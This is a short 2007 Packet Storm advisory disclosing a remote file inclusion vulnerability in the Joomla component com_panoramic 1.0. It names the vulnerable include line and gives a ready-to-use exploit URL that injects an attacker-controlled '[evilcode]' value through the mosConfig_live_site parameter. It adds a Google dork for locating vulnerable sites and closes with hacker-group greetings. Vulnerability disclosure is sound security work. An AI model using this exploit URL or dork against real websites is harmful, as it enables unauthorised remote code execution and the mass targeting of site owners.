joomlapan-rfi.txt

2007-10-08T00:00:00
ID PACKETSTORM:59868
Type packetstorm
Reporter NoGe
Modified 2007-10-08T00:00:00

Description

                                        
                                            `==================================================================================================================================  
  
# panoramic joomla component 1.0 Remote File Include Vulnerability  
  
Component : com_panoramic version 1.0  
Download script : http://www.webmaster-tips.net/  
Dicovered by : NoGe  
Contact : pace.noge@hotmail.com  
  
==================================================================================================================================  
  
# Vulnerable found in /administrator/components/com_panoramic/admin.panoramic.php  
  
line 3 include( "$mosConfig_live_site/components/com_panoramic/about.html" );  
  
  
# Exploit  
  
  
http://localhost/path/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=[evilcode]  
  
  
# google dork  
  
inurl:com_panoramic  
  
==================================================================================================================================  
  
# Greetz  
  
[-] all crew #papuahacker #nyubicrew #baliemhackerlink  
[-] skulmatic olibekas ulga Cungkee nyubi k1tk4t newbie  
[-] yooogy Vaksin13 Oon_Boy Paman mousekill }^-^{ haliq  
[-] http://kapukvalley.net member  
  
==================================================================================================================================   
  
`